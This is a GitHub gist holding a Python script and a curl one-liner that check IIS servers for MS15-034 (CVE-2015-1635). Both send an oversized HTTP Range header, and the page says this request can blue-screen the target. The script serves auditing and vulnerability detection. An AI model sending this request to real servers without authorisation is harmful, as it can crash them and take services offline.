Created
April 15, 2015 18:16
-
-
Save ahhh/0366122ba15d82f5f1a6 to your computer and use it in GitHub Desktop.
Used to check for CVE-2015-1635 / MS15-034 which can lead to remote code execution. Currently when sending a request it can trigger a blue screen on the Windows Server, effectively rendering it offline.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| ___. .___ __ __ | |
| \_ |__ ____ ___.__. ____ ____ __| _// |________ __ __ _______/ |_ | |
| | __ \_/ __ < | |/ _ \ / \ / __ |\ __\_ __ \ | \/ ___/\ __\ | |
| | \_\ \ ___/\___ ( <_> ) | \/ /_/ | | | | | \/ | /\___ \ | | | |
| |___ /\___ > ____|\____/|___| /\____ | |__| |__| |____//____ > |__| | |
| \/ \/\/ \/ \/ \/ | |
| MS15-034 Checker | |
| Danger! This script has not been properly qa'd and will probably fail in terrible ways. | |
| It is based off a change in HTTP!UlpParseRange in which an error code is returned as a | |
| result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of | |
| an HTTP range request. | |
| -BF | |
| https://ma.ttias.be/remote-code-execution-via-http-request-in-iis-on-windows/ | |
| Oneshot: | |
| curl -v 10.0.1.1/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615" | |
| 8a8b2112 56 push esi | |
| 8a8b2113 6a00 push 0 | |
| 8a8b2115 2bc7 sub eax,edi | |
| 8a8b2117 6a01 push 1 | |
| 8a8b2119 1bca sbb ecx,edx | |
| 8a8b211b 51 push ecx | |
| 8a8b211c 50 push eax | |
| 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here | |
| ''' | |
| import socket | |
| import random | |
| ipAddr = "10.0.1.1" | |
| hexAllFfff = "18446744073709551615" | |
| req1 = "GET / HTTP/1.0\r\n\r\n" | |
| req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" | |
| print "[*] Audit Started" | |
| client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| client_socket.connect((ipAddr, 80)) | |
| client_socket.send(req1) | |
| boringResp = client_socket.recv(1024) | |
| if "Microsoft" not in boringResp: | |
| print "[*] Not IIS" | |
| exit(0) | |
| client_socket.close() | |
| client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| client_socket.connect((ipAddr, 80)) | |
| client_socket.send(req) | |
| goodResp = client_socket.recv(1024) | |
| if "Requested Range Not Satisfiable" in goodResp: | |
| print "[!!] Looks VULN" | |
| elif " The request has an invalid header name" in goodResp: | |
| print "[*] Looks Patched" | |
| else: | |
| print "[*] Unexpected response, cannot discern patch status" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment